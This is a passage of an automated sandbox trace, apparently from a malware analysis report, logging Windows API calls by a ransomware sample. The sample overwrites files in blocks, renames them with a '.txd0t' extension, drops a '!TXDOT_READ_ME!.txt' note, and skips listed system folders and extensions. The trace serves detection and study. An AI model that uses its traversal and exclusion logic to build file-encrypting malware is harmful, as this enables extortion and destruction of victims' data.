SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.545] WriteFile (in: hFile=0x460, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0089.546] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffefee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.546] ReadFile (in: hFile=0x460, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x53ef730, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef730*=0x100000, lpOverlapped=0x0) returned 1 [0089.570] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.570] WriteFile (in: hFile=0x460, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x53ef734, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef734*=0x100000, lpOverlapped=0x0) returned 1 [0089.574] FlushFileBuffers (hFile=0x460) returned 1 [0089.984] GetProcessHeap () returned 0xe30000 [0089.984] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x150) returned 0xed4530 [0089.984] StrCpyW (in: psz1=0xed4530, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" [0089.984] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" [0089.984] StrCpyW (in: psz1=0xed4548, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.984] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.984] GetProcessHeap () returned 0xe30000 [0089.985] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed4530 | out: hHeap=0xe30000) returned 1 [0089.985] CloseHandle (hObject=0x460) returned 1 [0089.985] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx.txd0t")) returned 1 [0089.985] SetEvent (hEvent=0x414) returned 1 [0089.985] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0090.984] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0092.004] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0093.000] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0094.050] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0095.079] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0096.157] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0097.200] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0098.241] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0099.372] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0100.437] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0101.518] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0103.202] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0104.405] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0105.724] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0107.499] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0108.724] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0110.706] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0114.067] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0116.261] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0117.557] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0119.090] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0120.099] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0121.105] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0122.121] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0123.139] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0124.195] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0125.277] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0126.294] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0127.309] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0128.722] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0129.797] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0130.812] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0131.845] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0132.998] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0134.501] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0137.981] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0139.144] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0140.552] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0141.555] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0142.570] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0143.615] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0144.715] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) Thread: id = 15 os_tid = 0xec8 [0070.802] GetProcessHeap () returned 0xe30000 [0070.802] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x486) returned 0xec59c8 [0070.802] StrCpyNW (in: psz1=0xec59c8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0070.802] StrNCatW (in: psz1="C:", psz2="\\*", cchMax=1030 | out: psz1="C:\\*") returned="C:\\*" [0070.802] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x552fc58 | out: lpFindFileData=0x552fc58*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0xec20b0 [0070.803] StrCmpW (psz1="$GetCurrent", psz2=".") returned -1 [0070.803] StrCmpW (psz1="$GetCurrent", psz2="..") returned -1 [0070.803] StrCpyNW (in: psz1=0xec59c8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0070.803] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0070.803] StrNCatW (in: psz1="C:\\", psz2="$GetCurrent", cchMax=1030 | out: psz1="C:\\$GetCurrent") returned="C:\\$GetCurrent" [0070.803] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\windows\\system32\\") returned 0x0 [0070.803] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\windows\\syswow64\\") returned 0x0 [0070.803] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\windows\\system\\") returned 0x0 [0070.803] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\windows\\winsxs\\") returned 0x0 [0070.803] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\appdata\\roaming\\") returned 0x0 [0070.803] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\appdata\\local\\") returned 0x0 [0070.803] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\appdata\\locallow\\") returned 0x0 [0070.803] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\all users\\microsoft\\") returned 0x0 [0070.803] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\inetpub\\logs\\") returned 0x0 [0070.803] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\boot\\") returned 0x0 [0070.803] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\perflogs\\") returned 0x0 [0070.803] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\programdata\\") returned 0x0 [0070.803] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\drivers\\") returned 0x0 [0070.803] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\wsus\\") returned 0x0 [0070.803] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\efstmpwp\\") returned 0x0 [0070.803] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\$recycle.bin\\") returned 0x0 [0070.803] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="crypt_detect") returned 0x0 [0070.803] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="cryptolocker") returned 0x0 [0070.803] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="ransomware") returned 0x0 [0070.803] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="C:\\WINDOWS") returned 0x0 [0070.803] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="C:\\Program Files (x86)") returned 0x0 [0070.803] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="C:\\Program Files") returned 0x0 [0070.803] GetProcessHeap () returned 0xe30000 [0070.803] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x49e) returned 0xec5e58 [0070.804] StrCpyNW (in: psz1=0xec5e58, psz2="C:\\$GetCurrent", cchMax=1054 | out: psz1="C:\\$GetCurrent") returned="C:\\$GetCurrent" [0070.804] StrNCatW (in: psz1="C:\\$GetCurrent", psz2="\\*", cchMax=1054 | out: psz1="C:\\$GetCurrent\\*") returned="C:\\$GetCurrent\\*" [0070.804] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\*", lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec21f0 [0070.805] StrCmpW (psz1=".", psz2=".") returned 0 [0070.805] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.805] StrCmpW (psz1="..", psz2=".") returned 1 [0070.805] StrCmpW (psz1="..", psz2="..") returned 0 [0070.805] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0070.805] StrCmpW (psz1="Logs", psz2=".") returned 1 [0070.805] StrCmpW (psz1="Logs", psz2="..") returned 1 [0070.805] StrCpyNW (in: psz1=0xec5e58, psz2="C:\\$GetCurrent", cchMax=1054 | out: psz1="C:\\$GetCurrent") returned="C:\\$GetCurrent" [0070.805] StrNCatW (in: psz1="C:\\$GetCurrent", psz2="\\", cchMax=1054 | out: psz1="C:\\$GetCurrent\\") returned="C:\\$GetCurrent\\" [0070.806] StrNCatW (in: psz1="C:\\$GetCurrent\\", psz2="Logs", cchMax=1054 | out: psz1="C:\\$GetCurrent\\Logs") returned="C:\\$GetCurrent\\Logs" [0070.806] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\windows\\system32\\") returned 0x0 [0070.806] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\windows\\syswow64\\") returned 0x0 [0070.806] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\windows\\system\\") returned 0x0 [0070.806] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\windows\\winsxs\\") returned 0x0 [0070.806] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\appdata\\roaming\\") returned 0x0 [0070.806] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\appdata\\local\\") returned 0x0 [0070.806] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\appdata\\locallow\\") returned 0x0 [0070.806] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\all users\\microsoft\\") returned 0x0 [0070.806] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\inetpub\\logs\\") returned 0x0 [0070.806] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\boot\\") returned 0x0 [0070.806] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\perflogs\\") returned 0x0 [0070.806] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\programdata\\") returned 0x0 [0070.806] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\drivers\\") returned 0x0 [0070.806] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\wsus\\") returned 0x0 [0070.806] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\efstmpwp\\") returned 0x0 [0070.806] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\$recycle.bin\\") returned 0x0 [0070.806] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="crypt_detect") returned 0x0 [0070.806] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="cryptolocker") returned 0x0 [0070.806] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="ransomware") returned 0x0 [0070.806] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="C:\\WINDOWS") returned 0x0 [0070.806] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="C:\\Program Files (x86)") returned 0x0 [0070.806] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="C:\\Program Files") returned 0x0 [0070.806] GetProcessHeap () returned 0xe30000 [0070.806] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4a8) returned 0xec7308 [0070.806] StrCpyNW (in: psz1=0xec7308, psz2="C:\\$GetCurrent\\Logs", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs") returned="C:\\$GetCurrent\\Logs" [0070.806] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs", psz2="\\*", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\*") returned="C:\\$GetCurrent\\Logs\\*" [0070.806] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\Logs\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2670 [0070.808] StrCmpW (psz1=".", psz2=".") returned 0 [0070.808] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.808] StrCmpW (psz1="..", psz2=".") returned 1 [0070.808] StrCmpW (psz1="..", psz2="..") returned 0 [0070.809] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x542c8aac, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0xafe5f7a, ftLastWriteTime.dwHighDateTime=0x1d3273e, nFileSizeHigh=0x0, nFileSizeLow=0xa6b2, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="downlevel_2017_09_07_02_02_39_766.log", cAlternateFileName="DOWNLE~1.LOG")) returned 1 [0070.809] StrCmpW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2=".") returned 1 [0070.809] StrCmpW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="..") returned 1 [0070.809] StrCpyNW (in: psz1=0xec7308, psz2="C:\\$GetCurrent\\Logs", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs") returned="C:\\$GetCurrent\\Logs" [0070.809] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs", psz2="\\", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\") returned="C:\\$GetCurrent\\Logs\\" [0070.809] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs\\", psz2="downlevel_2017_09_07_02_02_39_766.log", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" [0070.809] PathFindExtensionW (pszPath="downlevel_2017_09_07_02_02_39_766.log") returned=".log" [0070.809] StrCmpW (psz1=".log", psz2=".txd0t") returned -1 [0070.809] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="bootsect.bak") returned 1 [0070.809] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="iconcache.db") returned -1 [0070.809] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="thumbs.db") returned -1 [0070.809] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2=" ransomware ") returned 1 [0070.809] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2=" ransom ") returned 1 [0070.809] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="debug.txt") returned 1 [0070.809] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="boot.ini") returned 1 [0070.809] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="desktop.ini") returned 1 [0070.809] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="autorun.inf") returned 1 [0070.809] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="ntuser.dat") returned -1 [0070.809] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="ntldr") returned -1 [0070.809] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="ntdetect.com") returned -1 [0070.809] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="bootfont.bin") returned 1 [0070.809] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="!TXDOT_READ_ME!.txt") returned 1 [0070.809] PathFindExtensionW (pszPath="downlevel_2017_09_07_02_02_39_766.log") returned=".log" [0070.809] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".log") returned 0x0 [0070.809] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0070.809] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0070.810] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0070.810] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0070.810] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0070.810] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0070.810] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x973abb0f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1774, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="oobe_2017_09_07_03_08_57_737.log", cAlternateFileName="OOBE_2~1.LOG")) returned 1 [0070.810] StrCmpW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2=".") returned 1 [0070.810] StrCmpW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="..") returned 1 [0070.810] StrCpyNW (in: psz1=0xec7308, psz2="C:\\$GetCurrent\\Logs", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs") returned="C:\\$GetCurrent\\Logs" [0070.810] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs", psz2="\\", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\") returned="C:\\$GetCurrent\\Logs\\" [0070.810] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs\\", psz2="oobe_2017_09_07_03_08_57_737.log", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" [0070.810] PathFindExtensionW (pszPath="oobe_2017_09_07_03_08_57_737.log") returned=".log" [0070.810] StrCmpW (psz1=".log", psz2=".txd0t") returned -1 [0070.810] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="bootsect.bak") returned 1 [0070.810] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="iconcache.db") returned 1 [0070.810] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="thumbs.db") returned -1 [0070.810] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2=" ransomware ") returned 1 [0070.810] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2=" ransom ") returned 1 [0070.810] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="debug.txt") returned 1 [0070.810] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="boot.ini") returned 1 [0070.811] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="desktop.ini") returned 1 [0070.811] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="autorun.inf") returned 1 [0070.811] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="ntuser.dat") returned 1 [0070.811] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="ntldr") returned 1 [0070.811] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="ntdetect.com") returned 1 [0070.811] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="bootfont.bin") returned 1 [0070.811] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="!TXDOT_READ_ME!.txt") returned 1 [0070.811] PathFindExtensionW (pszPath="oobe_2017_09_07_03_08_57_737.log") returned=".log" [0070.811] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".log") returned 0x0 [0070.811] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0070.811] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0070.811] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0070.811] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0070.811] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0070.811] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0070.811] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 1 [0070.811] StrCmpW (psz1="PartnerSetupCompleteResult.log", psz2=".") returned 1 [0070.811] StrCmpW (psz1="PartnerSetupCompleteResult.log", psz2="..") returned 1 [0070.811] StrCpyNW (in: psz1=0xec7308, psz2="C:\\$GetCurrent\\Logs", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs") 